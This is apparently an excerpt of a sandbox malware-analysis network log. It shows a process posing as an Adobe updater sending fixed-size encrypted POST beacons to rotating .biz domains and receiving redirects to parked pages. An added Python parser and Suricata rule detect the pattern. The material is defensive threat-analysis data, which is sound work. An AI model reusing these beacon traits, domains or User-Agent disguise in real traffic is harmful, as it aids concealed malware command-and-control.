Jan 15, 2025 12:58:23.307351112 CET | 1236 | IN | Data Ascii: nt));}}if (status.needsreview === true || status.needsreview == "true") {ajaxQuery(scriptPath + "/track.php?domain=" + encodeURIComponent(domain) + "&caf=1&toggle=needsreview&uid=" + encodeURIComponent(uniqueTrackingID));}if ((status.adult ===


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.22 | 49193 | 82.112.184.197 | 80 | 3728 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 12:58:23.491602898 CET | 352 | OUT | POST /yhhdkvr HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: vjaxhpbji.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 850
Jan 15, 2025 12:58:23.491602898 CET | 850 | OUT | Data: 850-byte non-printable (binary) request body


Session ID | Source IP    | Source Port | Destination IP | Destination Port | PID | Process
30         | 192.168.2.22 | 49194       | 82.112.184.197 | 80               |     |
Timestamp                           | Bytes transferred | Direction | Data
Jan 15, 2025 12:58:34.600212097 CET | 353               | OUT       | POST /fekpygna HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: vjaxhpbji.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 784
Jan 15, 2025 12:58:34.600213051 CET | 784               | OUT       | Data Raw: e7 9d 0a 09 69 a0 a7 7d 04 03 00 00 0d 60 e4 4e 11 d1 79 46 43 0f 80 3a 1e a2 99 fe 69 3f c9 1c 87 c8 73 29 4e df 30 10 9b 74 01 97 da d4 e6 5c 96 f1 86 7c 7c 94 64 a7 a9 13 c7 01 b2 42 27 ef 44 36 f6 54 86 1f 2d a5 63 27 3b 2c 91 b0 62 17 39 b2
    Data Ascii: i}`NyFC:i?s)N0t\||dB'D6T-c';,b9FZXF7|U6uM~t9xVTmyIR3/M9Fq$XZY=#R}g0o 0 !onT}sX:J$?XFea?Iyrb;#h6N_


Session ID | Source IP    | Source Port | Destination IP | Destination Port | PID  | Process
31         | 192.168.2.22 | 49195       | 47.129.31.212  | 80               | 3728 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp                           | Bytes transferred | Direction | Data
Jan 15, 2025 12:58:45.271426916 CET | 353               | OUT       | POST /wuwlkmskpl HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: xlfhhhm.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 850
Jan 15, 2025 12:58:45.271461010 CET | 850               | OUT       | Data Raw: 79 77 8e 05 9c 54 62 8b 46 03 00 00 f6 0f f4 6d e8 a3 d3 29 5b 04 1a f5 6a 5e 10 b2 18 0b b1 5d c9 a0 49 7e fb 64 19 d5 81 75 71 c7 47 35 26 d6 4d b1 61 4c 1b 44 00 1b 42 2d a5 8e 56 fd 79 78 5c 7f 31 1d bd 83 26 e1 e8 d9 5e 45 66 56 4b 88 2d 85
    Data Ascii: ywTbFm)[j^]I~duqG5&MaLDB-Vyx\1&^EfVK-Q,sy4xi6BY#Z^-juy~+Qm<-eV3UlQtvC=A#y6(Nr{8}^dg3$~CI{}BI.Z%@
Jan 15, 2025 12:58:46.651240110 CET | 411               | IN        | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 15 Jan 2025 11:58:46 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=c8887b93043879e78466622055662fc6|8.46.123.189|1736942326|1736942326|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP    | Source Port | Destination IP | Destination Port | PID  | Process
32         | 192.168.2.22 | 49196       | 13.251.16.150  | 80               | 3728 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp                           | Bytes transferred | Direction | Data
Jan 15, 2025 12:58:46.829199076 CET | 358               | OUT       | POST /uknkrwvskelclnbw HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: ifsaia.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 850
Jan 15, 2025 12:58:46.829232931 CET | 850               | OUT       | Data Raw: 5f 91 5a d6 0d d6 e2 76 46 03 00 00 f8 19 62 77 64 de 32 9b da 5a 22 42 2b 0a ad 11 93 98 d6 76 b0 cb 80 09 bc 7d 34 13 73 74 dc 39 bf a0 c7 4d 3b 56 a3 f9 b6 95 d1 8c eb d6 ce e0 70 87 64 ca 3f e9 36 d6 a2 f5 d9 68 bf d3 77 87 d8 93 7f 11 d9 ba
    Data Ascii: _ZvFbwd2Z"B+v}4st9M;Vpd?6hwSrw2(0G_/(LE_YO2wW<yDHjNj*Qa ^5J8YBiIKmw`\DShBbaM3@)Kn7dJ1j{IfCn9<w;
Jan 15, 2025 12:58:48.202047110 CET | 410               | IN        | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 15 Jan 2025 11:58:47 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=03c3896676812fcf647ffe76c239c893|8.46.123.189|1736942327|1736942327|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP    | Source Port | Destination IP | Destination Port | PID  | Process
33         | 192.168.2.22 | 49197       | 44.221.84.105  | 80               | 3728 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp                           | Bytes transferred | Direction | Data
Jan 15, 2025 12:58:48.314614058 CET | 353               | OUT       | POST /kskvulsy HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: saytjshyf.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 850
Jan 15, 2025 12:58:48.314649105 CET | 850               | OUT       | Data Raw: 47 c3 28 dd c4 ec 0e 48 46 03 00 00 7a ba 5c e4 d2 8c 83 98 ed a8 f3 b2 62 6a 53 56 bf 70 36 27 b1 c5 39 f4 bc fd 84 97 2d 7e 9b db 8d 33 21 41 8d 0f d2 0f ef 5b a2 42 84 92 10 a0 63 c4 c3 4b 24 bb 5f 3c 2e 81 46 f4 ef 15 b5 fd 85 a7 29 3e 11 bd
    Data Ascii: G(HFz\bjSVp6'9-~3!A[BcK$_<.F)>VnYr"^dg<5}Pq*LI7Y(7:> xRH13419C"'@cwXpRRn%CQKX9/Ec6~ie\qEBTUr
Jan 15, 2025 12:58:48.773777008 CET | 413               | IN        | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 15 Jan 2025 11:58:48 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=d868d7197701664740d671e75764850e|8.46.123.189|1736942328|1736942328|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP    | Source Port | Destination IP | Destination Port | PID  | Process
34         | 192.168.2.22 | 49198       | 18.141.10.107  | 80               | 3728 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp                           | Bytes transferred | Direction | Data
Jan 15, 2025 12:58:48.829803944 CET | 348               | OUT       | POST /gsqrd HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: vcddkls.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 850
Jan 15, 2025 12:58:48.830065966 CET | 850               | OUT       | Data Raw: a4 c2 55 87 20 fa e7 62 46 03 00 00 39 a4 e7 59 26 9f 80 21 02 49 31 1f 0b a5 2d b2 0e dd 0f 97 26 01 a6 31 42 bd 11 94 06 38 8a 68 78 12 af b7 02 9d 0f 4e 0b c7 fd 49 83 fb 2c 15 f3 7a 46 25 46 d6 33 66 52 30 b1 25 11 08 cb ea d4 4e 6d 28 50 ad
    Data Ascii: U bF9Y&!I1-&1B8hxNI,zF%F3fR0%Nm(P1u*+EhaE+*L^yss?qh|-76wfL%}Mfc")l<?9j"{-q^zs"]XNo/rJ(qzOI
Jan 15, 2025 12:58:50.191101074 CET | 411               | IN        | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 15 Jan 2025 11:58:49 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=c2ec2e7c551a8e738059ea627ced60d5|8.46.123.189|1736942329|1736942329|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.22 | 49199 | 72.52.178.23 | 80 | 3728 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 12:58:50.241914988 CET | 344 | OUT | POST /qdy HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fwiwk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 850
Jan 15, 2025 12:58:50.241960049 CET | 850 | OUT | Data Raw: f2 9d 63 ae 27 23 a6 a3 46 03 00 00 d5 bd 7d 0a b5 34 05 23 2a 1a 1a 8e 92 1b 8e e1 1b 9c 64 06 f1 4e e2 45 57 88 06 1c 25 e6 79 55 f9 4a c7 8e 19 00 13 8b bc 26 2c 26 4c 06 88 78 8a 09 9f 81 8b 9f 48 23 c1 36 76 56 38 77 d4 a2 1c 2b 17 60 3a a1
Data Ascii: c'#F}4#*dNEW%yUJ&,&LxH#6vV8w+`:kT#gETHq6n'ZqwAK}.[eKZCi<\)u9@o}On4:>qXboCld)!.De'(!B'
Jan 15, 2025 12:58:50.788702011 CET | 276 | IN | HTTP/1.1 302 Moved Temporarily
Date: Wed, 15 Jan 2025 11:58:50 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
Location: http://ww12.fwiwk.biz/qdy?usid=20&utid=14164936400
Cache-Control: no-cache
Pragma: no-cache
Access-Control-Allow-Origin: *
Jan 15, 2025 12:58:50.999663115 CET | 276 | IN | HTTP/1.1 302 Moved Temporarily
Date: Wed, 15 Jan 2025 11:58:50 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
Location: http://ww12.fwiwk.biz/qdy?usid=20&utid=14164936400
Cache-Control: no-cache
Pragma: no-cache
Access-Control-Allow-Origin: *
Jan 15, 2025 12:58:51.694822073 CET | 347 | OUT | POST /lderrm HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fwiwk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 850
Jan 15, 2025 12:58:51.694993019 CET | 850 | OUT | Data Raw: 75 3f f4 ca d6 b8 ed ef 46 03 00 00 a9 9f b3 65 76 8a 37 63 6b 35 0a 61 f9 16 64 f7 d5 cd 2e ad d0 81 bf 72 e9 de 7e c7 fa f6 c8 25 6d 08 5f 83 ac 2d b9 08 de 62 ed 6d b4 37 0f ac 83 c5 2a 85 84 41 39 7c 16 c2 46 39 6d 1b 9c b9 41 bb 0e 2c e4 97
Data Ascii: u?Fev7ck5ad.r~%m_-bm7*A9|F9mA,[)?AFZu7<:-IKt);\%fl!cd4o/7Z+v>`LRP.z4$9d3PH2gpK*)2VXg>f
Jan 15, 2025 12:58:51.909724951 CET | 278 | IN | HTTP/1.1 302 Moved Temporarily
Date: Wed, 15 Jan 2025 11:58:51 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
Location: http://ww7.fwiwk.biz/lderrm?usid=20&utid=14164936613
Cache-Control: no-cache
Pragma: no-cache
Access-Control-Allow-Origin: *
Jan 15, 2025 12:58:52.119919062 CET | 278 | IN | HTTP/1.1 302 Moved Temporarily
Date: Wed, 15 Jan 2025 11:58:51 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
Location: http://ww7.fwiwk.biz/lderrm?usid=20&utid=14164936613
Cache-Control: no-cache
Pragma: no-cache
Access-Control-Allow-Origin: *
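Added example, not part of the Joe Sandbox report: a small parser for the HTTP session log above, written to turn the flattened packet rows (timestamp, byte count and direction run together, as in "CET344OUTPOST /qdy HTTP/1.1", or separated by "|") into records, then pull out what an analyst wants from session 35: the two POSTs from the armsvc.exe process to fwiwk.biz that carry an identical 850-byte opaque body under changing paths, the 302 chain to ww12/ww7 subdomains, and a Suricata rule keyed on the unusual WindowsWechat User-Agent. The sample input is copied from session 35 with some headers and the duplicate 302 packets dropped; the "fixed-size repeated POST" check is a generic heuristic, not a signature from the report, and the Suricata sid is a placeholder in the local range.

```python
"""Parse the Joe Sandbox HTTP session dump and extract the beacon pattern.
Constructed input: lines copied from session 35 of this report, shortened."""
import re
from collections import defaultdict
from dataclasses import dataclass, field

UA = ("Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
      "Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI "
      "WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400")

SAMPLE = f"""\
Jan 15, 2025 12:58:50.241914988 CET344OUTPOST /qdy HTTP/1.1
Host: fwiwk.biz
User-Agent: {UA}
Content-Length: 850
Jan 15, 2025 12:58:50.241960049 CET850OUTData Raw: f2 9d 63 ae 27 23 a6 a3 46 03 00 00
Data Ascii: c'#F
Jan 15, 2025 12:58:50.788702011 CET276INHTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://ww12.fwiwk.biz/qdy?usid=20&utid=14164936400
Jan 15, 2025 12:58:51.694822073 CET347OUTPOST /lderrm HTTP/1.1
Host: fwiwk.biz
User-Agent: {UA}
Content-Length: 850
Jan 15, 2025 12:58:51.694993019 CET850OUTData Raw: 75 3f f4 ca d6 b8 ed ef 46 03 00 00
Jan 15, 2025 12:58:51.909724951 CET278INHTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://ww7.fwiwk.biz/lderrm?usid=20&utid=14164936613
"""

# Timestamp, byte count and direction are fused in the extracted report
# ("CET344OUTPOST ..."); the regex also accepts a "|"-separated layout.
PACKET_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d+ [A-Z]{3,4})"
    r"\s*\|?\s*(?P<bytes>\d+)\s*\|?\s*(?P<dir>IN|OUT)\s*\|?\s*(?P<data>.*)$")
REQUEST_RE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d$")
STATUS_RE = re.compile(r"^HTTP/\d\.\d (?P<status>\d{3})")


@dataclass
class Message:
    timestamp: str
    direction: str          # OUT = sandbox to server, IN = server to sandbox
    nbytes: int             # size of the packet carrying start line and headers
    start_line: str
    headers: dict = field(default_factory=dict)
    body_bytes: int = 0     # size of the separate "Data Raw" body packet, if any

    def request(self):
        """(method, target) for a request line, None for a status line."""
        m = REQUEST_RE.match(self.start_line)
        return (m.group("method"), m.group("target")) if m else None

    def status(self):
        m = STATUS_RE.match(self.start_line)
        return int(m.group("status")) if m else None


def parse_dump(text):
    """Build Message objects; a timestamped "Data Raw" packet is attached to the
    message whose headers preceded it, untimestamped Data Raw/Ascii echoes are skipped."""
    messages, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("Data Raw:", "Data Ascii:")):
            continue
        m = PACKET_RE.match(line)
        if m is None:                       # header line of the current message
            if current is not None and ":" in line:
                name, _, value = line.partition(":")
                current.headers[name.strip().lower()] = value.strip()
            continue
        if m.group("data").startswith("Data Raw:"):
            if current is not None and current.direction == m.group("dir"):
                current.body_bytes += int(m.group("bytes"))
            continue
        current = Message(m.group("ts"), m.group("dir"), int(m.group("bytes")), m.group("data"))
        messages.append(current)
    return messages


def find_beacons(messages, min_repeats=2):
    """Heuristic, not a signature: repeated POSTs to one host with an identical
    declared body size while the path changes look like a fixed-format check-in."""
    groups = defaultdict(list)
    for msg in messages:
        req = msg.request()
        if msg.direction == "OUT" and req and req[0] == "POST":
            groups[(msg.headers.get("host"), msg.headers.get("content-length"))].append(msg)
    return [{"host": host, "content_length": int(length), "count": len(msgs),
             "targets": [m.request()[1] for m in msgs],
             "user_agent": msgs[0].headers.get("user-agent")}
            for (host, length), msgs in groups.items()
            if len(msgs) >= min_repeats and length and length.isdigit()]


def redirect_chain(messages):
    """Pair each request with the first response after it and report the Location
    of 3xx answers (the ww12/ww7 hosts in this session)."""
    chain, pending = [], None
    for msg in messages:
        if msg.direction == "OUT":
            pending = msg
        elif pending is not None and msg.status() is not None:
            req = pending.request()
            chain.append((req[1] if req else None, msg.status(), msg.headers.get("location")))
            pending = None
    return chain


def suricata_rule(ua_fragment, sid=1000001):
    """Suricata (5+) rule on the UA substring present in every request above.
    sid 1000001 is a placeholder in the local range (assumption)."""
    return ('alert http $HOME_NET any -> $EXTERNAL_NET any ('
            'msg:"Fixed-size POST beacon with WindowsWechat UA (Joe Sandbox 1591772)"; '
            'flow:established,to_server; http.method; content:"POST"; '
            f'http.user_agent; content:"{ua_fragment}"; '
            f'classtype:trojan-activity; sid:{sid}; rev:1;)')
```

Running find_beacons over the full session 35 text gives one group (fwiwk.biz, 850 bytes, two requests under /qdy and /lderrm); the duplicate 302 packets in the original log are harmless to redirect_chain because only the first response after each request is paired. Match the rule on the UA rather than on the domain, since the hosts rotate while the string "WindowsWechat" in a User-Agent from a process named armsvc.exe is the stable oddity.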


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.22 | 49200 | 76.223.26.96 | 80 | 3728 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 12:58:50.951627016 CET | 352 | OUT | GET /qdy?usid=20&utid=14164936400 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Host: ww12.fwiwk.biz
Jan 15, 2025 12:58:51.579607964 CET | 823 | IN | HTTP/1.1 200 OK
Accept-Ch: viewport-width
Accept-Ch: dpr
Accept-Ch: device-memory
Accept-Ch: rtt
Accept-Ch: downlink
Accept-Ch: ect
Accept-Ch: ua
Accept-Ch: ua-full-version
Accept-Ch: ua-platform
Accept-Ch: ua-platform-version
Accept-Ch: ua-arch
Accept-Ch: ua-model
Accept-Ch: ua-mobile
Accept-Ch-Lifetime: 30
Content-Type: text/html; charset=UTF-8
Date: Wed, 15 Jan 2025 11:58:51 GMT
Server: Caddy
Server: nginx
Vary: Accept-Encoding
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_OT1tcFuM0xqIMG1SOnpM8MwMO3Au6ekkHiLbjGZt5bfKbfAUELkpZEsT/z6dPga0MCXvzjtNxqK4v6V5Wjw7tg==
X-Domain: fwiwk.biz
X-Pcrew-Blocked-Reason:
X-Pcrew-Ip-Organization: CenturyLink
X-Subdomain: ww12
Transfer-Encoding: chunked
Jan 15, 2025 12:58:51.579704046 CET | 1236 | IN | Data Raw: 33 64 31 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4c 71 75 44
Data Ascii: 3d1f<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_OT1tcFuM0xqIMG1SOnpM8MwMO3Au6ekkHiLbjGZt5bfKbfAUELkpZEsT/z6dPga0MCXvz
Jan 15, 2025 12:58:51.579735041 CET | 224 | IN | Data Raw: 6e 3a 30 20 30 20 33 70 78 20 32 30 70 78 3b 0a 7d 0a 0a 2e 73 69 74 65 6c 69 6e 6b 48 6f 6c 64 65 72 20 7b 0a 09 6d 61 72 67 69 6e 3a 2d 31 35 70 78 20 30 20 31 35 70 78 20 33 35 70 78 3b 0a 7d 0a 0a 23 61 6a 61 78 6c 6f 61 64 65 72 48 6f 6c 64
Data Ascii: n:0 0 3px 20px;}.sitelinkHolder {margin:-15px 0 15px 35px;}#ajaxloaderHolder {display: block;width: 24px;height: 24px;background: #fff;padding: 8px 0 0 8px;margin:10px auto;-webkit-border-radius: 4px;
Jan 15, 2025 12:58:51.579787016 CET | 1236 | IN | Data Raw: 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 09 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 7d 3c 2f 73 74 79 6c 65 3e 20 20 20 20 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a
Data Ascii: -moz-border-radius: 4px;border-radius: 4px;}</style> <style media="screen">* { margin:0;padding:0}body { background:#101c36; font-family: sans-serif; text-align: center; font-size:1rem;}.header { padding:1r
Jan 15, 2025 12:58:51.579822063 CET | 1236 | IN | Data Raw: 20 20 20 63 6f 6c 6f 72 3a 23 36 32 36 35 37 34 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 0a 2e 73 65 61 72 63 68 48 6f 6c 64 65 72 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 31 70 78 20 30 20 31 70 78 20 31 70 78 3b 0a 20 20 20 20 6d 61 72
Data Ascii: color:#626574 !important;}.searchHolder { padding:1px 0 1px 1px; margin:1rem auto; width: 95%; max-width: 500px;}@media screen and (min-width:600px) { .comp-is-parked, .comp-sponsored { color: #848484;
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.579849958 CET164INData Raw: 20 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 27 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 6d 61 57 78 73 50 53
                                                                                                                                                                                                                                                                        Data Ascii: height: 24px; background-image: url('data:image/svg+xml;base64,PHN2ZyBmaWxsPScjRDdEN0Q3JyBzdHlsZT0iZmxvYXQ6IHJpZ2h0IiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9z
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.579881907 CET1236INData Raw: 64 6d 63 69 49 47 68 6c 61 57 64 6f 64 44 30 69 4d 6a 51 69 49 48 5a 70 5a 58 64 43 62 33 67 39 49 6a 41 67 4d 43 41 79 4e 43 41 79 4e 43 49 67 64 32 6c 6b 64 47 67 39 49 6a 49 30 49 6a 34 38 63 47 46 30 61 43 42 6b 50 53 4a 4e 4d 43 41 77 61 44
                                                                                                                                                                                                                                                                        Data Ascii: dmciIGhlaWdodD0iMjQiIHZpZXdCb3g9IjAgMCAyNCAyNCIgd2lkdGg9IjI0Ij48cGF0aCBkPSJNMCAwaDI0djI0SDB6IiBmaWxsPSJub25lIi8+PHBhdGggZD0iTTUuODggNC4xMkwxMy43NiAxMmwtNy44OCA3Ljg4TDggMjJsMTAtMTBMOCAyeiIvPjwvc3ZnPg==');}</style> </head><body id="a
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.579915047 CET1236INData Raw: 3c 62 72 2f 3e 0a 3c 62 72 2f 3e 3c 62 72 2f 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53
                                                                                                                                                                                                                                                                        Data Ascii: <br/><br/><br/> </div></div><script type="text/javascript" language="JavaScript"> var tcblock = { // Required and steady 'container': 'tc', 'type': 'relatedsearch', 'colorBackground': 'transparent',
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.579945087 CET448INData Raw: 51 35 4e 44 67 32 4f 44 6b 32 59 54 4a 6c 4e 44 4d 31 4e 6a 55 31 4f 57 4d 32 4f 57 51 79 4e 6a 59 33 4d 7a 55 33 4f 54 42 6c 4e 6d 45 77 5a 54 45 36 4e 6a 63 34 4e 32 45 79 5a 6d 49 32 4f 57 45 31 4e 77 3d 3d 27 3b 20 20 20 20 20 20 20 20 20 6c
                                                                                                                                                                                                                                                                        Data Ascii: Q5NDg2ODk2YTJlNDM1NjU1OWM2OWQyNjY3MzU3OTBlNmEwZTE6Njc4N2EyZmI2OWE1Nw=='; let search=''; let themedata='fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjl8fHx8fHw2Nzg3YTJmYjY5OWUxfHx8MTczNjk0MjMzMS40NzIzfDVlMDY2YTUwNGE1ZTA4Njcy
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.580003977 CET1236INData Raw: 54 4a 69 4d 6a 4e 6d 59 6a 41 77 4e 7a 67 34 4e 6a 45 7a 5a 54 68 69 5a 57 45 7a 59 7a 6b 33 4e 54 6b 77 59 54 6c 6d 59 57 59 34 4d 6d 49 79 59 6d 56 38 4d 48 78 6b 63 43 31 30 5a 57 46 74 61 57 35 30 5a 58 4a 75 5a 58 51 78 4d 6c 38 7a 63 47 68
                                                                                                                                                                                                                                                                        Data Ascii: TJiMjNmYjAwNzg4NjEzZThiZWEzYzk3NTkwYTlmYWY4MmIyYmV8MHxkcC10ZWFtaW50ZXJuZXQxMl8zcGh8MHwwfDE3NzkyNzU0NTh8fHw='; let domain='fwiwk.biz'; let scriptPath=''; let adtest='off';if(top.location!==location) { top.location.href=l
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.584866047 CET1236INData Raw: 6e 74 61 69 6e 65 72 4e 61 6d 65 73 29 29 20 7b 61 6a 61 78 51 75 65 72 79 28 73 63 72 69 70 74 50 61 74 68 20 2b 20 22 2f 74 72 61 63 6b 2e 70 68 70 22 2b 20 22 3f 74 6f 67 67 6c 65 3d 61 64 6c 6f 61 64 65 64 22 2b 20 22 26 75 69 64 3d 22 20 2b
